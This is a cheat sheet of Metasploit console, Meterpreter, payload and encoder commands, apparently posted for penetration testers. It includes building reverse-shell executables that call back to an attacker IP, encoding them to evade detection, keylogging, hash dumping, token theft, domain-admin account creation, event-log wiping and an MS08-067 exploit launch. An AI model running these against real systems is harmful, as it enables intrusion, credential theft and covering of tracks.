REFRENCE   METASPOIT

1. This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.
2. 
   
3. MSFconsole Commands:
4. 
   
5. Select All
6. Code:
7. show exploits
8. Show all exploits within the Framework.
9. 
   
10. Select All
11. Code:
12. show payloads
13. Show all payloads within the Framework.
14. 
    
15. Select All
16. Code:
17. show auxiliary
18. Show all auxiliary modules within the Framework.
19. 
    
20. 
    
21. Select All
22. Code:
23. search name
24. Search for exploits or modules within the Framework.
25. 
    
26. Select All
27. Code:
28. info
29. Load information about a specific exploit or module.
30. 
    
31. Select All
32. Code:
33. use name
34. Load an exploit or module (example: use windows/smb/psexec).
35. 
    
36. Select All
37. Code:
38. LHOST
39. Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
40. 
    
41. Select All
42. Code:
43. RHOST
44. The remote host or the target.
45. 
    
46. Select All
47. Code:
48. set function
49. Set a specific value (for example, LHOST or RHOST).
50. 
    
51. Select All
52. Code:
53. setg function
54. Set a specific value globally (for example, LHOST or RHOST).
55. 
    
56. Select All
57. Code:
58. show options
59. Show the options available for a module or exploit.
60. 
    
61. Select All
62. Code:
63. show targets
64. Show the platforms supported by the exploit.
65. 
    
66. Select All
67. Code:
68. set target num
69. Specify a specific target index if you know the OS and service pack.
70. 
    
71. Select All
72. Code:
73. set payload payload
74. Specify the payload to use.
75. 
    
76. Select All
77. Code:
78. show advanced
79. Show advanced options.
80. 
    
81. Select All
82. Code:
83. set autorunscript migrate -f
84. Automatically migrate to a separate process upon exploit completion.
85. 
    
86. Select All
87. Code:
88. check
89. Determine whether a target is vulnerable to an attack.
90. 
    
91. Select All
92. Code:
93. exploit
94. Execute the module or exploit and attack the target.exploit -j
95. Run the exploit under the context of the job. (This will run the exploit in the background.)
96. 
    
97. Select All
98. Code:
99. exploit -z
100. Do not interact with the session after successful exploitation.
101. 
     
102. Select All
103. Code:
104. exploit -e encoder
105. Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
106. 
     
107. Select All
108. Code:
109. exploit -h
110. Display help for the exploit command.
111. 
     
112. Select All
113. Code:
114. sessions -l
115. List available sessions (used when handling multiple shells).
116. 
     
117. Select All
118. Code:
119. sessions -l -v
120. List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
121. 
     
122. Select All
123. Code:
124. sessions -s script
125. Run a specific Meterpreter script on all Meterpreter live sessions.
126. 
     
127. Select All
128. Code:
129. sessions -K
130. Kill all live sessions.
131. 
     
132. Select All
133. Code:
134. sessions -c cmd
135. Execute a command on all live Meterpreter sessions.
136. 
     
137. Select All
138. Code:
139. sessions -u sessionID
140. Upgrade a normal Win32 shell to a Meterpreter console.
141. 
     
142. Select All
143. Code:
144. db_create name
145. Create a database to use with database-driven attacks (example: db_create autopwn).
146. 
     
147. Select All
148. Code:
149. db_connect name
150. Create and connect to a database for driven attacks (example: db_connect autopwn).
151. 
     
152. Select All
153. Code:
154. db_nmap
155. Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
156. 
     
157. Select All
158. Code:
159. db_autopwn -h
160. Display help for using db_autopwn.
161. 
     
162. Select All
163. Code:
164. db_autopwn -p -r -e
165. Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
166. 
     
167. Select All
168. Code:
169. db_destroy
170. Delete the current database.
171. 
     
172. Select All
173. Code:
174. db_destroy user:password@host:port/database
175. Delete database using advanced options.
176. 
     
177. Meterpreter Commands help:
178. Open Meterpreter usage help.
179. 
     
180. Select All
181. Code:
182. run scriptname
183. Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
184. 
     
185. Select All
186. Code:
187. sysinfo
188. Show the system information on the compromised target.
189. 
     
190. Select All
191. Code:
192. ls
193. List the files and folders on the target.
194. 
     
195. Select All
196. Code:
197. use priv
198. Load the privilege extension for extended Meterpreter libraries.
199. 
     
200. Select All
201. Code:
202. ps
203. Show all running processes and which accounts are associated with each process.
204. 
     
205. Select All
206. Code:
207. migrate PID
208. Migrate to the specific process ID (PID is the target process ID gained from the ps command).
209. 
     
210. Select All
211. Code:
212. use incognito
213. Load incognito functions. (Used for token stealing and impersonation on a target machine.)
214. 
     
215. Select All
216. Code:
217. list_tokens -u
218. List available tokens on the target by user.
219. 
     
220. Select All
221. Code:
222. list_tokens -g
223. List available tokens on the target by group.
224. 
     
225. Select All
226. Code:
227. impersonate_token DOMAIN_NAME\\USERNAME
228. Impersonate a token available on the target.
229. 
     
230. Select All
231. Code:
232. steal_token PID
233. Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.
234. 
     
235. Select All
236. Code:
237. getsystem
238. Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
239. 
     
240. Select All
241. Code:
242. shell
243. Drop into an interactive shell with all available tokens.
244. 
     
245. Select All
246. Code:
247. execute -f cmd.exe -i
248. Execute cmd.exe and interact with it.
249. 
     
250. Select All
251. Code:
252. execute -f cmd.exe -i -t
253. Execute cmd.exe with all available tokens.
254. 
     
255. Select All
256. Code:
257. execute -f cmd.exe -i -H -t
258. Execute cmd.exe with all available tokens and make it a hidden process.
259. 
     
260. Select All
261. Code:
262. rev2self
263. Revert back to the original user you used to compromise the target.
264. 
     
265. Select All
266. Code:
267. reg command
268. Interact, create, delete, query, set, and much more in the target’s registry.
269. 
     
270. Select All
271. Code:
272. setdesktop number
273. Switch to a different screen based on who is logged in.
274. 
     
275. Select All
276. Code:
277. screenshot
278. Take a screenshot of the target’s screen.
279. 
     
280. Select All
281. Code:
282. upload file
283. Upload a file to the target.
284. 
     
285. Select All
286. Code:
287. download file
288. Download a file from the target.
289. 
     
290. Select All
291. Code:
292. keyscan_start
293. Start sniffing keystrokes on the remote target.
294. 
     
295. Select All
296. Code:
297. keyscan_dump
298. Dump the remote keys captured on the target.
299. 
     
300. Select All
301. Code:
302. keyscan_stop
303. Stop sniffing keystrokes on the remote target.
304. 
     
305. Select All
306. Code:
307. getprivs
308. Get as many privileges as possible on the target.
309. 
     
310. Select All
311. Code:
312. uictl enable keyboard/mouse
313. Take control of the keyboard and/or mouse.
314. 
     
315. Select All
316. Code:
317. background
318. Run your current Meterpreter shell in the background.
319. 
     
320. Select All
321. Code:
322. hashdump
323. Dump all hashes on the target.
324. 
     
325. Select All
326. Code:
327. use sniffer
328. Load the sniffer module.
329. 
     
330. Select All
331. Code:
332. sniffer_interfaces
333. List the available interfaces on the target.
334. 
     
335. Select All
336. Code:
337. sniffer_dump interfaceID pcapname
338. Start sniffing on the remote target.
339. 
     
340. Select All
341. Code:
342. sniffer_start interfaceID packet-buffer
343. Start sniffing with a specific range for a packet buffer.
344. 
     
345. Select All
346. Code:
347. sniffer_stats interfaceID
348. Grab statistical information from the interface you are sniffing.
349. 
     
350. Select All
351. Code:
352. sniffer_stop interfaceID
353. Stop the sniffer.
354. 
     
355. Select All
356. Code:
357. add_user username password -h ip
358. Add a user on the remote target.
359. 
     
360. Select All
361. Code:
362. add_group_user "Domain Admins" username -h ip
363. Add a username to the Domain Administrators group on the remote target.
364. 
     
365. Select All
366. Code:
367. clearev
368. Clear the event log on the target machine.
369. 
     
370. Select All
371. Code:
372. timestomp
373. Change file attributes, such as creation date (antiforensics measure).
374. 
     
375. Select All
376. Code:
377. reboot
378. Reboot the target machine.
379. 
     
380. MSFpayload Commands:
381. 
     
382. Select All
383. Code:
384. msfpayload -h
385. List available payloads.
386. 
     
387. Select All
388. Code:
389. msfpayload windows/meterpreter/bind_tcp O
390. List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
391. 
     
392. Select All
393. Code:
394. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
395. Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.
396. 
     
397. Select All
398. Code:
399. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
400. Same as above, but export as raw format. This will be used later in msfencode
401. 
     
402. Select All
403. Code:
404. msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
405. Same as above but export as C-formatted shellcode.
406. 
     
407. Select All
408. Code:
409. msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
410. Export as %u encoded JavaScript.
411. 
     
412. MSFencode Commands:
413. 
     
414. Select All
415. Code:
416. msfencode -h
417. Display the msfencode help.
418. 
     
419. Select All
420. Code:
421. msfencode -l
422. List the available encoders.
423. 
     
424. Select All
425. Code:
426. msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
427. Format to display the encoded buffer.
428. 
     
429. Select All
430. Code:
431. msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
432. Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
433. 
     
434. Select All
435. Code:
436. msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
437. Create a multi-encoded payload.
438. 
     
439. Select All
440. Code:
441. msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
442. Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.
443. 
     
444. MSFcli Commands:
445. 
     
446. Select All
447. Code:
448. msfcli | grep exploit
449. Show only exploits.
450. 
     
451. Select All
452. Code:
453. msfcli | grep exploit/windows
454. Show only Windows exploits.
455. 
     
456. Select All
457. Code:
458. msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
459. Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on port 443.